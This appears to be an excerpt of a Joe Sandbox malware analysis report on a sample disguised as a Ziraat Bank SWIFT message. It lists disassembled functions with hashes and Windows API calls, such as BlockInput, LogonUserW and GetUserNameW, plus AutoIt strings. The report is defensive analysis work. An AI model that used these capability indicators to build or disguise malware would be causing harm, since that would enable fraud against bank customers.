Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 2f4a25925f50b18a7008b7dd50863dd8341471ce84d3dda5d96e19e5f917408a
Instruction ID: 5794602d455366295f7c446b2bd7dd7f336b916fb845749a59103ce40a844f3d
Opcode Fuzzy Hash: 2f4a25925f50b18a7008b7dd50863dd8341471ce84d3dda5d96e19e5f917408a
Instruction Fuzzy Hash: 34E04835200204AFC750EF99D404D9AB7ECAF74751F04C456FA45D7651DAB1F8449B91

Function 000E74BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 000E74DE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: e4dc388cad307f0be8f68c6e52d7381376d550721bfff79c169edc09723a12e3
Instruction ID: d0dded162b809b580df1534d950af7c8d9f495db96703126f1a70b31124b54d9
Opcode Fuzzy Hash: e4dc388cad307f0be8f68c6e52d7381376d550721bfff79c169edc09723a12e3
Instruction Fuzzy Hash: 36D05EE012C3853CFC7907269C0FF7A0948F3007C0F948289B28AE94C2FAC058429132

Function 000DB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000DAD3E), ref: 000DB124

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 69a5d02ada68e1501e7e33a842485c357b97e56e0fc5939e2bac5aec248138ce
Instruction ID: 6e4f0dbb6fa6fda60bef38aac6a823b6d974bd768645243c04c0c929e614e93e
Opcode Fuzzy Hash: 69a5d02ada68e1501e7e33a842485c357b97e56e0fc5939e2bac5aec248138ce
Instruction Fuzzy Hash: 6DD05E320A460EBEDF024FA4EC02EAE3F6AEB04700F508110FA11C50A0C671D532AB50

Function 0011B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0011B352

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ea725a073afff3beaeff9a3f2216b4413e12041ce7d7beb4ff2520b07641f556
Instruction ID: 0359412ed597e4996d5677579ac694b323f3ad08b1003eb5de6b84c262e035bf
Opcode Fuzzy Hash: ea725a073afff3beaeff9a3f2216b4413e12041ce7d7beb4ff2520b07641f556
Instruction Fuzzy Hash: 85C04CB1401109DFC755CBD0D944AEEB7BCAB04301F104091A105F1110D7709B859B76

Function 000C8189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 000C818F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 91b8b55b248b2f2e77b8d21e45755f8f7594a795bc971eb755e1c6c9079c7cdb
Instruction ID: 68151e698dfce300ab3aa05f5affb4aae28e4f82f230bffdd4f378be695694b2
Opcode Fuzzy Hash: 91b8b55b248b2f2e77b8d21e45755f8f7594a795bc971eb755e1c6c9079c7cdb
Instruction Fuzzy Hash: DBA0223000020CFBCF002F82FC0A8883F2CFB002A0B200020F80C80830CB33A8B28AC2

Function 000AE3B0 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4864259b1ba4c12cd99403cf786939930ba9d97ccfc5bc27979482744cbb6f82
Instruction ID: 2f230e34d320681478651af695e29b90e2694dc36de20286a66c260a56df2dd0
Opcode Fuzzy Hash: 4864259b1ba4c12cd99403cf786939930ba9d97ccfc5bc27979482744cbb6f82
Instruction Fuzzy Hash: 6A22AE70A04246CFDB24DF94C890AFEB7F0FF19304F148569E94A9B392E735A985CB91

Function 000A93F0 Relevance: .5, Instructions: 531COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bee6673da75821a810a022104f11a861cef3ab224830c283afd76e3e06917f
Instruction ID: d5ec4de47f70f36be5ac6b8c9646675bedf7c6fb98d7b50066961f4fd09e5c68
Opcode Fuzzy Hash: 15bee6673da75821a810a022104f11a861cef3ab224830c283afd76e3e06917f
Instruction Fuzzy Hash: 20127B70A00609DFDF18DFA8D985AEEB7F5FF49300F104529E806E7291EB36A960CB50

Function 000AAF50 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID:
API String ID: 3728558374-0
Opcode ID: ee381c0ce4e892f4e73cc84781adf0c11b26776bd8f85d4002bb059197b59ac9
Instruction ID: e7d0ac07b743cfe2f4c67bfab15ab07901244c7528571961fe89be7b97025c63
Opcode Fuzzy Hash: ee381c0ce4e892f4e73cc84781adf0c11b26776bd8f85d4002bb059197b59ac9
Instruction Fuzzy Hash: 5C02B370A00205DFCF18DFA8D991AEEBBB5FF49300F148069E806DB256EB35DA55CB91

Function 000C02A4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 0f4ff24fdaa846527c5983cd1d403ddf083f1ad0a1a66c5ca6513677c0b98804
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: F4C1A4322051A34ADFAD4739883497FBAE15BA2BB131A076DD8B3CB4D5EF20C524D620

Function 000C06D9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: e5fec43e8a3832fdb426ce67ef91bc2d63d5bfd0bba8e0cb0ef9a19fc71ac1f1
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: CCC1B5322091934ADFAD4739C834A7EBAE15FA2BB131A076DD4B3DB4D5EF20D524D620

Function 000BFA57 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: bf31d2da089e4075b09aeebf7da5ab345e2076e759ad52c67cb9775b2dc2596f
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 71C1923220909309DFAD4639CC744BEBAE15BA2BB131A077DD8B3DB5D9EF20C564D620

Function 00C08168 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: b645153062c9099077e699c4ffb0ff0e4db69b457bd357b7fa011278b67254c1
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8841D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 00C08058 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 23ac82c74cff124d22bcfe419155eb802540910c53bd90e012548ff1f4f79ba6
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 1F019D78A01209EFCB48DF98C5909AEF7B5FB48314F208699E959A7341DB31AE45DB80

Function 00C07FF8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 3751aaea4ea309203a863ea81e81505b0c8a42f01acdb2a9d22ccd122a780990
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 7E019278A05209EFCB48DF98C5909AEF7B5FB48310F208699E919A7741D731AE45DB80

Function 00C069A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1339065104.0000000000C04000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C04000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c04000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 000FA2A9 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 000FA2FE
DeleteObject.GDI32(00000000), ref: 000FA310
DestroyWindow.USER32 ref: 000FA31E
GetDesktopWindow.USER32 ref: 000FA338
GetWindowRect.USER32(00000000), ref: 000FA33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 000FA480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 000FA490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA4D8
GetClientRect.USER32(00000000,?), ref: 000FA4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 000FA51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA55E
GlobalLock.KERNEL32(00000000), ref: 000FA567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA576
GlobalUnlock.KERNEL32(00000000), ref: 000FA57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA586
GlobalFree.KERNEL32(00000000), ref: 000FA591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0012D9BC,00000000), ref: 000FA5B9
GlobalFree.KERNEL32(00000000), ref: 000FA5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 000FA5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 000FA60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 000FA81D

Strings

, xrefs: 000FA7A3
@U=u, xrefs: 000FA60E, 000FA79D
AutoIt v3, xrefs: 000FA4D0
DISPLAY, xrefs: 000FA680
static, xrefs: 000FA518, 000FA66F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: d0bc8d47cea8b25273b1083bc2910830d4a6425de4e794108fab0e7a14f64975
Instruction ID: 44988fe7a76547385ec96da55834e63273f6141b434120adf82ab3b6a43bf615
Opcode Fuzzy Hash: d0bc8d47cea8b25273b1083bc2910830d4a6425de4e794108fab0e7a14f64975
Instruction Fuzzy Hash: 1C027071A00208FFDB14DFA4DD89EAE7BB9FB49310F148158FA199B6A1C770AD41DB60

Function 0010D285 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0010D2DB
GetSysColorBrush.USER32(0000000F), ref: 0010D30C
GetSysColor.USER32(0000000F), ref: 0010D318
SetBkColor.GDI32(?,000000FF), ref: 0010D332
SelectObject.GDI32(?,00000000), ref: 0010D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0010D36C
GetSysColor.USER32(00000010), ref: 0010D374
CreateSolidBrush.GDI32(00000000), ref: 0010D37B
FrameRect.USER32(?,?,00000000), ref: 0010D38A
DeleteObject.GDI32(00000000), ref: 0010D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0010D3DC
FillRect.USER32(?,?,00000000), ref: 0010D40E
GetWindowLongW.USER32(?,000000F0), ref: 0010D439

Part of subcall function 0010D575: GetSysColor.USER32(00000012), ref: 0010D5AE
Part of subcall function 0010D575: SetTextColor.GDI32(?,?), ref: 0010D5B2
Part of subcall function 0010D575: GetSysColorBrush.USER32(0000000F), ref: 0010D5C8
Part of subcall function 0010D575: GetSysColor.USER32(0000000F), ref: 0010D5D3
Part of subcall function 0010D575: GetSysColor.USER32(00000011), ref: 0010D5F0
Part of subcall function 0010D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0010D5FE
Part of subcall function 0010D575: SelectObject.GDI32(?,00000000), ref: 0010D60F
Part of subcall function 0010D575: SetBkColor.GDI32(?,00000000), ref: 0010D618
Part of subcall function 0010D575: SelectObject.GDI32(?,?), ref: 0010D625
Part of subcall function 0010D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0010D644
Part of subcall function 0010D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0010D65B
Part of subcall function 0010D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0010D670
Part of subcall function 0010D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0010D698

Strings

@U=u, xrefs: 0010D463

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID: @U=u
API String ID: 3521893082-2594219639
Opcode ID: c93bb9b29d159626918e35c05d82d47800488fe7e6ae8cbe4ea5ae68c125ab0b
Instruction ID: e18ea5f19743db6dea9f06d200bc26bc91056dfd2293eebbc18393dac9748a07
Opcode Fuzzy Hash: c93bb9b29d159626918e35c05d82d47800488fe7e6ae8cbe4ea5ae68c125ab0b
Instruction Fuzzy Hash: 65919271408301BFD7209F64EC08E6B7BB9FF89325F100A19F9A2965E0D7B1D995CB52

Function 000BB8FD Relevance: 51.2, APIs: 27, Strings: 2, Instructions: 491windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 000BB98B
DeleteObject.GDI32(00000000), ref: 000BB9CD
DeleteObject.GDI32(00000000), ref: 000BB9D8
DestroyIcon.USER32(00000000), ref: 000BB9E3
DestroyWindow.USER32(00000000), ref: 000BB9EE
SendMessageW.USER32(?,00001308,?,00000000), ref: 0011D2AA
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0011D2E3
MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0011D711

Part of subcall function 000BB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000BB759,?,00000000,?,?,?,?,000BB72B,00000000,?), ref: 000BBA58

SendMessageW.USER32 ref: 0011D758
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0011D76F
ImageList_Destroy.COMCTL32(00000000), ref: 0011D785
ImageList_Destroy.COMCTL32(00000000), ref: 0011D790

Strings

0, xrefs: 0011D5A5
@U=u, xrefs: 0011D2AA, 0011D3B1, 0011D68E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 464785882-975001249
Opcode ID: c98e7433b8a64a510203b3cf9074415f1bad3185b31021101847e01712f83afd
Instruction ID: 492c6a223ba4143bf671826d52a6487cdfee3a18273b002995cc40d9549c9f09
Opcode Fuzzy Hash: c98e7433b8a64a510203b3cf9074415f1bad3185b31021101847e01712f83afd
Instruction Fuzzy Hash: A7126B70204201AFDB29CF24E884BE9BBF5BF45304F144579E999CB662C771E896CB91

Function 0010D575 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0010D5AE
SetTextColor.GDI32(?,?), ref: 0010D5B2
GetSysColorBrush.USER32(0000000F), ref: 0010D5C8
GetSysColor.USER32(0000000F), ref: 0010D5D3
CreateSolidBrush.GDI32(?), ref: 0010D5D8
GetSysColor.USER32(00000011), ref: 0010D5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0010D5FE
SelectObject.GDI32(?,00000000), ref: 0010D60F
SetBkColor.GDI32(?,00000000), ref: 0010D618
SelectObject.GDI32(?,?), ref: 0010D625
InflateRect.USER32(?,000000FF,000000FF), ref: 0010D644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0010D65B
GetWindowLongW.USER32(00000000,000000F0), ref: 0010D670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0010D698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0010D6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 0010D6DD
DrawFocusRect.USER32(?,?), ref: 0010D6E8
GetSysColor.USER32(00000011), ref: 0010D6F6
SetTextColor.GDI32(?,00000000), ref: 0010D6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0010D712
SelectObject.GDI32(?,0010D2A5), ref: 0010D729
DeleteObject.GDI32(?), ref: 0010D734
SelectObject.GDI32(?,?), ref: 0010D73A
DeleteObject.GDI32(?), ref: 0010D73F
SetTextColor.GDI32(?,?), ref: 0010D745
SetBkColor.GDI32(?,?), ref: 0010D74F

Strings

@U=u, xrefs: 0010D698

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
